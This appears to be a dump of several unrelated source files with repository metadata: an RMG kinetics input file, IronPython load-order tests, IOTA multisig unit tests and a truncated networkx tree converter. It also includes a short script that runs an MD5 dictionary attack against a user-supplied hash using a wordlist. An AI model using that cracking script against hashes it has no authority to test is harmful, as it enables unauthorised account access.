collisionModel = TransportData(shapeIndex=2, epsilon=(892.977,'J/mol'), sigma=(3.458,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=1.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.02957,-0.00263999,1.52235e-05,-1.71679e-08,6.26771e-12,322.677,4.84424], Tmin=(100,'K'), Tmax=(923.901,'K')), NASAPolynomial(coeffs=[4.1513,0.00191152,-4.11308e-07,6.35038e-11,-4.86452e-15,83.4341,3.09359], Tmin=(923.901,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(2.67648,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(58.2013,'J/(mol*K)'), label="""HO2""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'O(4)',
structure = SMILES('[O]'),
E0 = (243.005,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (15.9994,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(665.16,'J/mol'), sigma=(2.75,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,-2.38914e-13,3.12709e-16,-1.33367e-19,1.7499e-23,29226.7,5.11107], Tmin=(100,'K'), Tmax=(4383.16,'K')), NASAPolynomial(coeffs=[2.50003,-3.04997e-08,1.01101e-11,-1.48797e-15,8.20356e-20,29226.7,5.11085], Tmin=(4383.16,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(243.005,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""O""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'CCCC([O])CCC(151)',
structure = SMILES('CCCC([O])CCC'),
E0 = (-157.754,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2764.29,2778.57,2792.86,2807.14,2821.43,2835.71,2850,1425,1433.33,1441.67,1450,1225,1241.67,1258.33,1275,1270,1293.33,1316.67,1340,700,733.333,766.667,800,300,333.333,366.667,400,1380,1390,370,380,2900,435,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,200,800,1066.67,1333.33,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (115.193,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.447159,0.089151,-5.8819e-05,1.98848e-08,-2.76336e-12,-18806.6,33.7866], Tmin=(100,'K'), Tmax=(1640.09,'K')), NASAPolynomial(coeffs=[18.0491,0.0440406,-1.75618e-05,3.11448e-09,-2.07048e-13,-24873.7,-64.5982], Tmin=(1640.09,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-157.754,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(532.126,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(CC(C)OJ)"""),
)
species(
label = 'N2',
structure = SMILES('N#N'),
E0 = (-8.69489,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (28.0135,'amu'),
collisionModel = TransportData(shapeIndex=1, epsilon=(810.913,'J/mol'), sigma=(3.621,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(1.76,'angstroms^3'), rotrelaxcollnum=4.0, comment="""PrimaryTransportLibrary"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.61263,-0.00100893,2.49898e-06,-1.43375e-09,2.58635e-13,-1051.1,2.6527], Tmin=(100,'K'), Tmax=(1817.04,'K')), NASAPolynomial(coeffs=[2.97591,0.0016414,-7.19719e-07,1.25377e-10,-7.91522e-15,-1025.85,5.53754], Tmin=(1817.04,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-8.69489,'kJ/mol'), Cp0=(29.1007,'J/(mol*K)'), CpInf=(37.4151,'J/(mol*K)'), label="""N2""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'Ne',
structure = SMILES('[Ne]'),
E0 = (-6.19738,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (20.1797,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(1235.53,'J/mol'), sigma=(3.758e-10,'m'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with fixed Lennard Jones Parameters. This is the fallback method! Try improving transport databases!"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,3.35532], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,3.35532], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-6.19738,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""Ne""", comment="""Thermo library: primaryThermoLibrary"""),
)
transitionState(
label = 'TS1',
E0 = (-29.8083,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS2',
E0 = (195.023,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS3',
E0 = (234.086,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS4',
E0 = (204.792,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS5',
E0 = (247.602,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS6',
E0 = (200.694,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS7',
E0 = (241.633,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS8',
E0 = (252.433,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS9',
E0 = (278.096,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS10',
E0 = (-3.6475,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS11',
E0 = (-32.0968,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS12',
E0 = (-87.2015,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS13',
E0 = (-54.8589,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS14',
E0 = (-40.7595,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS15',
E0 = (85.2504,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
reaction(
label = 'reaction1',
reactants = ['O2(2)', 'CCC[CH]CCC(73)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS1',
kinetics = Arrhenius(A=(7.54e+12,'cm^3/(mol*s)','+|-',1e+12), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""From training reaction 112 used for O2_birad;C_rad/H/NonDeC
Exact match found for rate rule [C_rad/H/NonDeC;O2_birad]
Euclidian distance = 0
Multiplied by reaction path degeneracy 2.0
family: R_Recombination"""),
)
reaction(
label = 'reaction6',
reactants = ['CCC[CH]O[O](143)', 'npropyl(70)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS2',
kinetics = Arrhenius(A=(1.15e+14,'cm^3/(mol*s)','*|/',2), n=-0.35, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2500,'K'), comment="""Estimated using template [C_rad/H/NonDe;C_rad/H2/Cs] for rate rule [C_rad/H/CsO;C_rad/H2/Cs]
Euclidian distance = 2.0
family: R_Recombination"""),
)
reaction(
label = 'reaction7',
reactants = ['H(3)', 'CCC[C](CCC)O[O](144)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS3',
kinetics = Arrhenius(A=(6.68468e+06,'m^3/(mol*s)'), n=-0.0135, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [C_rad/NonDe;Y_rad] for rate rule [C_rad/NonDeCO;H_rad]
Euclidian distance = 2.2360679775
family: R_Recombination
Ea raised from -0.9 to 0 kJ/mol."""),
)
reaction(
label = 'reaction8',
reactants = ['C2H5(32)', '[CH2]C(CCC)O[O](145)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS4',
kinetics = Arrhenius(A=(8.73e+14,'cm^3/(mol*s)'), n=-0.699, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(200,'K'), Tmax=(2000,'K'), comment="""From training reaction 11 used for C_rad/H2/Cs;C_rad/H2/Cs
Exact match found for rate rule [C_rad/H2/Cs;C_rad/H2/Cs]
Euclidian distance = 0
family: R_Recombination
Ea raised from -0.0 to 0 kJ/mol."""),
)
reaction(
label = 'reaction9',
reactants = ['H(3)', 'CC[CH]C(CCC)O[O](146)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS5',
kinetics = Arrhenius(A=(2e+13,'cm^3/(mol*s)','*|/',3.16), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2000,'K'), comment="""From training reaction 59 used for H_rad;C_rad/H/NonDeC
Exact match found for rate rule [C_rad/H/NonDeC;H_rad]
Euclidian distance = 0
family: R_Recombination"""),
)
reaction(
label = 'reaction10',
reactants = ['[CH2]CC(CCC)O[O](147)', 'CH3(18)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS6',
kinetics = Arrhenius(A=(1.23e+15,'cm^3/(mol*s)'), n=-0.562, Ea=(0.085772,'kJ/mol'), T0=(1,'K'), Tmin=(200,'K'), Tmax=(2000,'K'), comment="""From training reaction 10 used for C_methyl;C_rad/H2/Cs
Exact match found for rate rule [C_rad/H2/Cs;C_methyl]
Euclidian distance = 0
family: R_Recombination"""),
)
reaction(
label = 'reaction11',
reactants = ['H(3)', 'C[CH]CC(CCC)O[O](148)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS7',
kinetics = Arrhenius(A=(2e+13,'cm^3/(mol*s)','*|/',3.16), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2000,'K'), comment="""From training reaction 59 used for H_rad;C_rad/H/NonDeC
Exact match found for rate rule [C_rad/H/NonDeC;H_rad]
Euclidian distance = 0
family: R_Recombination"""),
)
reaction(
label = 'reaction12',
reactants = ['H(3)', '[CH2]CCC(CCC)O[O](149)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS8',
kinetics = Arrhenius(A=(3.48677e-12,'cm^3/(molecule*s)'), n=0.6, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""From training reaction 18 used for C_rad/H2/Cs;H_rad
Exact match found for rate rule [C_rad/H2/Cs;H_rad]
Euclidian distance = 0
family: R_Recombination
Ea raised from -3.3 to 0 kJ/mol."""),
)
reaction(
label = 'reaction9',
reactants = ['CH2(S)(24)', 'CCCC(CC)O[O](150)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS9',
kinetics = Arrhenius(A=(1.31021e+06,'m^3/(mol*s)'), n=0.189, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [carbene;C_pri] for rate rule [carbene;C_pri/NonDeC]
Euclidian distance = 1.0
Multiplied by reaction path degeneracy 3.0
family: 1,2_Insertion_carbene
Ea raised from -1.5 to 0 kJ/mol."""),
)
reaction(
label = 'reaction2',
reactants = ['CCCC(CCC)O[O](138)'],
products = ['CCC[C](CCC)OO(139)'],
transitionState = 'TS10',
kinetics = Arrhenius(A=(4.97e+09,'s^-1'), n=1.01, Ea=(160.958,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""From training reaction 245 used for R3H_SS_O;O_rad_out;Cs_H_out_Cs2
Exact match found for rate rule [R3H_SS_O;O_rad_out;Cs_H_out_Cs2]
Euclidian distance = 0
family: intra_H_migration"""),
)
reaction(
label = 'reaction3',
reactants = ['CC[CH]C(CCC)OO(140)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS11',
kinetics = Arrhenius(A=(2960,'s^-1'), n=2.11, Ea=(84.0984,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2500,'K'), comment="""From training reaction 323 used for R4H_SSS;C_rad_out_H/NonDeC;O_H_out
Exact match found for rate rule [R4H_SSS;C_rad_out_H/NonDeC;O_H_out]
Euclidian distance = 0
family: intra_H_migration"""),
)
reaction(
label = 'reaction4',
reactants = ['CCCC(CCC)O[O](138)'],
products = ['C[CH]CC(CCC)OO(141)'],
transitionState = 'TS12',
kinetics = Arrhenius(A=(1.352e+11,'s^-1'), n=0.21, Ea=(77.404,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""From training reaction 261 used for R5H_SSSS_OCC_C;O_rad_out;Cs_H_out_H/NonDeC
Exact match found for rate rule [R5H_SSSS_OCC_C;O_rad_out;Cs_H_out_H/NonDeC]
Euclidian distance = 0
Multiplied by reaction path degeneracy 4.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction5',
reactants = ['[CH2]CCC(CCC)OO(142)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS13',
kinetics = Arrhenius(A=(135.127,'s^-1'), n=2.18479, Ea=(56.5049,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R6H_SSSSS;C_rad_out_2H;XH_out] for rate rule [R6H_SSSSS;C_rad_out_2H;O_H_out]
Euclidian distance = 1.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction14',
reactants = ['CCCC(CCC)O[O](138)'],
products = ['CCC=CCCC(122)', 'HO2(10)'],
transitionState = 'TS14',
kinetics = Arrhenius(A=(6.6e+09,'s^-1'), n=1.01, Ea=(123.846,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""From training reaction 6 used for R2OO_HNd_HNd
Exact match found for rate rule [R2OO_HNd_HNd]
Euclidian distance = 0
Multiplied by reaction path degeneracy 4.0
family: HO2_Elimination_from_PeroxyRadical"""),
)
reaction(
label = 'reaction15',
reactants = ['O(4)', 'CCCC([O])CCC(151)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS15',
kinetics = Arrhenius(A=(54738.4,'m^3/(mol*s)'), n=0.884925, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(303.03,'K'), Tmax=(2000,'K'), comment="""From training reaction 3 used for O_rad/NonDe;O_birad
Exact match found for rate rule [O_rad/NonDe;O_birad]
Euclidian distance = 0
family: Birad_R_Recombination
Ea raised from -2.9 to 0 kJ/mol."""),
)
# Pressure-dependent reaction network: a single peroxy-radical isomer formed
# from O2 adding to the C7 radical 'CCC[CH]CCC(73)', with an N2/Ne bath gas.
network(
    label = '42',
    # Unimolecular isomer(s) of the network (SMILES + RMG species index).
    isomers = [
        'CCCC(CCC)O[O](138)',
    ],
    # Bimolecular entry channel into the network.
    reactants = [
        ('O2(2)', 'CCC[CH]CCC(73)'),
    ],
    # Collider composition (mole fractions).
    bathGas = {
        'N2': 0.5,
        'Ne': 0.5,
    },
)
# Settings for the pressure-dependence (k(T,P)) calculation on network '42'.
pressureDependence(
    label = '42',
    # Temperature range and the discrete temperatures actually evaluated.
    Tmin = (300,'K'),
    Tmax = (2000,'K'),
    Tcount = 8,
    Tlist = ([302.47,323.145,369.86,455.987,609.649,885.262,1353.64,1896.74],'K'),
    # Pressure range and the discrete pressures actually evaluated.
    Pmin = (0.01,'bar'),
    Pmax = (100,'bar'),
    Pcount = 5,
    Plist = ([0.0125282,0.0667467,1,14.982,79.8202],'bar'),
    # Energy-grain discretization used when solving the network.
    maximumGrainSize = (0.5,'kcal/mol'),
    minimumGrainCount = 250,
    method = 'modified strong collision',
    # Fit the resulting rate coefficients to a Chebyshev polynomial of
    # order 6 in T and 4 in P.
    interpolationModel = ('Chebyshev', 6, 4),
    activeKRotor = True,
    activeJRotor = True,
    rmgmode = True,
)
| [
"qin.she@husky.neu.edu"
] | qin.she@husky.neu.edu |
e57fdecaa8e8af1f6a70af6ad39d54ded1593e07 | dec3093213b5586a187035848eb51aafbe62fb5c | /passgenerator.py | f1492a50bbf10aa88e2b6e8319a89760e795aa63 | [] | no_license | NikhiSharma/PasswordGeneratorThroughMD5Hash | 3beac4b39a82f5d32e774a523e0b08c8515bb4cf | d12fa9d4203899d5d85db4b7a5e8f63eddb2d235 | refs/heads/main | 2023-01-22T10:35:19.909647 | 2020-12-07T19:06:01 | 2020-12-07T19:06:01 | 319,416,848 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 794 | py | '''import string,random
def generatePassword(num):
password=''
for n in range(num):
x=random.randint(0,94)
password+=string.printable[x]
return password
print(generatePassword(16))
'''
import hashlib

# Simple MD5 dictionary attack: hash every candidate word from a wordlist
# file and compare the digest against the target hash supplied by the user.
pass_hash = input("Enter md5 hash: ")
wordlist = input("File name: ")

try:
    pass_file = open(wordlist, "r")
except OSError:
    # Covers a missing file as well as permission problems.
    print("No file found")
    raise SystemExit

found = False
# 'with' guarantees the wordlist file is closed even if hashing fails
# part-way through (the original never closed it).
with pass_file:
    for word in pass_file:
        # Strip trailing newline/whitespace so the digest matches the hash
        # of the bare candidate word.
        digest = hashlib.md5(word.encode('utf-8').strip()).hexdigest()
        if digest == pass_hash:
            print("password found")
            print("password is " + word)
            found = True
            break

if not found:
    print("password not in list")
| [
"noreply@github.com"
] | noreply@github.com |
e9eea4df8f1b7b7476963e1743ec066271cf9a73 | 9ef6107b62765082fdffa708fc2a8fc9aa6cbe1c | /Tests/interop/net/loadorder/t3h.py | 5e290012eae57a5c3727a59a3ec55d5c16b05805 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | dsonbill/IronPython3-NETCore | c1f94547c14d0b2f9955ed83a025efaae76cb0e3 | 8c76bdbec1754233f04b41ecd28e9bae2c862fd0 | refs/heads/master | 2022-12-23T11:26:17.219724 | 2017-10-23T11:06:10 | 2017-10-23T11:06:10 | 107,932,545 | 2 | 1 | Apache-2.0 | 2022-12-12T07:09:07 | 2017-10-23T04:36:00 | Python | UTF-8 | Python | false | false | 1,606 | py | #####################################################################################
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# This source code is subject to terms and conditions of the Apache License, Version 2.0. A
# copy of the license can be found in the License.html file at the root of this distribution. If
# you cannot locate the Apache License, Version 2.0, please send an email to
# ironpy@microsoft.com. By using this source code in any fashion, you are agreeing to be bound
# by the terms of the Apache License, Version 2.0.
#
# You must not remove this notice, or any other, from this software.
#
#
#####################################################################################
from iptest.assert_util import *
# Load an assembly defining the two-type-parameter First.Generic1<K, V>.
add_clr_assemblies("loadorder_3")
# namespace First {
#     public class Generic1<K, V> {
#         public static string Flag = typeof(Generic1<,>).FullName;
#     }
# }
import First
from First import *
# Only the 2-arity Generic1 exists at this point.
AreEqual(First.Generic1[str, str].Flag, "First.Generic1`2")
# Load a second assembly that adds a 1-arity First.Generic1<T> to the same
# namespace; both arities are then reachable through the namespace object.
add_clr_assemblies("loadorder_3h")
# namespace First {
#     public class Generic1<T> {
#         public static string Flag = typeof(Generic1<>).FullName;
#     }
# }
AreEqual(First.Generic1[str, str].Flag, "First.Generic1`2")
AreEqual(First.Generic1[int].Flag, "First.Generic1`1")
# The earlier star-import captured only the 2-arity Generic1, so the bare
# name cannot be parameterized with a single type argument yet.
AssertError(ValueError, lambda: Generic1[int]) # !!!
AreEqual(Generic1[str, str].Flag, "First.Generic1`2")
# Re-running the star-import refreshes the bare name; afterwards both
# arities resolve through it.
from First import *
AreEqual(Generic1[str, str].Flag, "First.Generic1`2")
AreEqual(Generic1[int].Flag, "First.Generic1`1")
| [
"jdhardy@gmail.com"
] | jdhardy@gmail.com |
08a13407b68ca6cda24394e7cdfc4eb4314bec1e | bc64931a5cdfed6d54a8d8828e9b9d4510d7a998 | /test/multisig/commands/create_multisig_address_test.py | 83ae9dbd6d76cdcf5210d0bea2085f4dc26f7cac | [
"MIT"
] | permissive | valentinlehuger/iota.lib.py | 4b9ddfda9c283b4fde6d9ba6ab5d6c1add5cd920 | e345de981829a36ceaccf3862835c0dd28486950 | refs/heads/master | 2021-01-19T12:26:09.709236 | 2017-07-16T01:19:39 | 2017-07-16T01:19:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,866 | py | # coding=utf-8
from __future__ import absolute_import, division, print_function, \
unicode_literals
from unittest import TestCase
import filters as f
from filters.test import BaseFilterTestCase
from iota import TryteString
from iota.adapter import MockAdapter
from iota.crypto.types import Digest
from iota.filters import Trytes
from iota.multisig import MultisigIota
from iota.multisig.commands import CreateMultisigAddressCommand
from iota.multisig.types import MultisigAddress
from six import binary_type, text_type
class CreateMultisigAddressCommandTestCase(TestCase):
  """
  Unit tests for :py:class:`CreateMultisigAddressCommand`.
  """
  # noinspection SpellCheckingInspection
  def setUp(self):
    super(CreateMultisigAddressCommandTestCase, self).setUp()

    self.adapter = MockAdapter()
    self.command = CreateMultisigAddressCommand(self.adapter)

    # A pair of well-formed digests, shared by the tests below.
    self.digest_1 = Digest(
      trytes =
        b'FWNEPVJNGUKTSHSBDO9AORBCVWWLVXC9KAMKYYNKPYNJDKSAUURI9ELKOEEYPKVTYP'
        b'CKOCJQESYFEMINIFKX9PDDGRBEEHYYXCJW9LHGWFZGHKCPVDBGMGQKIPCNKNITGMZT'
        b'DIWVUB9PCHCOPHMIWKSUKRHZOJPMAY',

      key_index = 0,
    )

    self.digest_2 = Digest(
      trytes =
        b'PAIRLDJQY9XAUSKIGCTHRJHZVARBEY9NNHYJ9UI9HWWZXFSDWEZEGDCWNVVYSYDV9O'
        b'HTR9NGGZURISWTNECFTCMEWQQFJ9VKLFPDTYJYXC99OLGRH9OSFJLMEOGHFDHZYEAF'
        b'IMIZTJRBQUVCR9U9ZWTMUXTUEOUBLC',

      key_index = 0,
    )

  def test_wireup(self):
    """
    The multisig API object exposes this command.
    """
    api = MultisigIota(self.adapter)

    self.assertIsInstance(api.createMultisigAddress, CreateMultisigAddressCommand)

  def test_happy_path(self):
    """
    Generating a multisig address from two digests.
    """
    # noinspection SpellCheckingInspection
    expected_address = MultisigAddress(
      trytes =
        b'JUIFYSUQFVBFGNHOJMLWBHMGASFGBPAUMRZRRCJF'
        b'CCOJHJKZVUOCEYSCLXAGDABCEWSUXCILJCGQWI9SF',

      digests = [self.digest_1, self.digest_2],
    )

    response = self.command(digests=[self.digest_1, self.digest_2])

    self.assertDictEqual(response, {'address': expected_address})
class CreateMultisigAddressRequestFilterTestCase(BaseFilterTestCase):
  """
  Unit tests for the request filter applied by
  ``CreateMultisigAddressCommand``.
  """
  # Filter under test: the request filter produced by the command.
  filter_type = CreateMultisigAddressCommand(MockAdapter()).get_request_filter
  # NOTE(review): presumably tells the base test case to skip its generic
  # value check for this filter -- confirm against BaseFilterTestCase.
  skip_value_check = True

  # noinspection SpellCheckingInspection
  def setUp(self):
    super(CreateMultisigAddressRequestFilterTestCase, self).setUp()

    # Define some tryte sequences that we can reuse between tests.
    self.digest_1 =\
      Digest(
        trytes =
          b'FWNEPVJNGUKTSHSBDO9AORBCVWWLVXC9KAMKYYNKPYNJDKSAUURI9ELKOEEYPKVTYP'
          b'CKOCJQESYFEMINIFKX9PDDGRBEEHYYXCJW9LHGWFZGHKCPVDBGMGQKIPCNKNITGMZT'
          b'DIWVUB9PCHCOPHMIWKSUKRHZOJPMAY',

        key_index = 0,
      )

    self.digest_2 =\
      Digest(
        trytes =
          b'PAIRLDJQY9XAUSKIGCTHRJHZVARBEY9NNHYJ9UI9HWWZXFSDWEZEGDCWNVVYSYDV9O'
          b'HTR9NGGZURISWTNECFTCMEWQQFJ9VKLFPDTYJYXC99OLGRH9OSFJLMEOGHFDHZYEAF'
          b'IMIZTJRBQUVCR9U9ZWTMUXTUEOUBLC',

        key_index = 0,
      )

  def test_pass_happy_path(self):
    """
    Request is valid.
    """
    request = {
      'digests': [self.digest_1, self.digest_2],
    }

    filter_ = self._filter(request)

    self.assertFilterPasses(filter_)
    self.assertDictEqual(filter_.cleaned_data, request)

  def test_pass_compatible_types(self):
    """
    Request contains values that can be converted to the expected
    types.
    """
    filter_ = self._filter({
      # ``digests`` may contain any values that can be converted into
      # :py:class:`Digest` objects.
      'digests': [binary_type(self.digest_1), TryteString(self.digest_2)],
    })

    self.assertFilterPasses(filter_)
    self.assertDictEqual(
      filter_.cleaned_data,

      {
        'digests': [self.digest_1, self.digest_2],
      },
    )

  def test_fail_empty(self):
    """
    Request is empty.
    """
    self.assertFilterErrors(
      {},

      {
        'digests': [f.FilterMapper.CODE_MISSING_KEY],
      },
    )

  def test_fail_unexpected_parameters(self):
    """
    Request contains unexpected parameters.
    """
    self.assertFilterErrors(
      {
        'digests': [self.digest_1, self.digest_2],

        # Oh, and I suppose that's completely inconspicuous.
        'foo': 'bar',
      },

      {
        'foo': [f.FilterMapper.CODE_EXTRA_KEY],
      },
    )

  def test_fail_digests_null(self):
    """
    ``digests`` is null.
    """
    self.assertFilterErrors(
      {
        'digests': None,
      },

      {
        'digests': [f.Required.CODE_EMPTY],
      },
    )

  def test_fail_digests_wrong_type(self):
    """
    ``digests`` is not an array.
    """
    self.assertFilterErrors(
      {
        'digests': self.digest_1,
      },

      {
        'digests': [f.Array.CODE_WRONG_TYPE],
      },
    )

  def test_fail_digests_empty(self):
    """
    ``digests`` is an array, but it's empty.
    """
    self.assertFilterErrors(
      {
        'digests': [],
      },

      {
        'digests': [f.Required.CODE_EMPTY],
      },
    )

  def test_fail_digests_contents_invalid(self):
    """
    ``digests`` is an array, but it contains invalid values.
    """
    self.assertFilterErrors(
      {
        'digests': [
          b'',
          True,
          None,
          b'not valid trytes',

          # This is actually valid; I just added it to make sure the
          # filter isn't cheating!
          TryteString(self.digest_1),

          2130706433,
        ],
      },

      {
        'digests.0': [f.Required.CODE_EMPTY],
        'digests.1': [f.Type.CODE_WRONG_TYPE],
        'digests.2': [f.Required.CODE_EMPTY],
        'digests.3': [Trytes.CODE_NOT_TRYTES],
        'digests.5': [f.Type.CODE_WRONG_TYPE],
      },
    )
| [
"phx@phx.ph"
] | phx@phx.ph |
a0815932e8ddab8b8f48ee48ac30b57112bca357 | a7f09e36253a6cde37eeddf142bec504f7e7e6f1 | /ATM/graphics/tree_converter.py | be9d0a0e6b1d775d7368a1877c2af06d67c62405 | [] | no_license | jermcmahan/ATM | 326c0a6da2f43e6671738d887bbc2e54ca1b3753 | bdc3454e3755c150c4095904f1a9d876b4d282ed | refs/heads/master | 2021-10-22T07:02:38.936085 | 2019-03-08T23:18:55 | 2019-03-08T23:18:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,297 | py | from networkx.classes.graph import Graph
"""
TreeConverter --- class to perform the conversion from an ATM proof-tree to the graphical representation of the tree
:author Jeremy McMahan
"""
class TreeConverter:
    """
    Performs the conversion from an ATM proof-tree to the graphical
    (networkx) representation of the tree.

    :author Jeremy McMahan
    """

    @staticmethod
    def to_graphics(T):
        """
        Constructs the graphical representation of the proof-tree from the
        computation tree.

        :param T: the ComputationTree
        :returns: the graphical representation of the proof-tree
        """
        graph = Graph()
        TreeConverter.to_nx_graph(T.proof_tree(), graph, 1)
        return graph

    @staticmethod
    def to_nx_graph(T, G, name):
        """
        Adds a subtree of a proof-tree into the networkx graph, using the
        given number as the name of the subtree's root vertex.

        :param T: a subtree of a proof-tree
        :param G: a networkx graph
        :param name: the name to be given to the root of T
        :returns: the next free name that can be used for a vertex
        """
        # Integer names keep vertices distinct even when several nodes
        # display the same state label.
        G.add_node(name, label=T.root[0])

        free_name = name + 1
        for subtree in T.children:
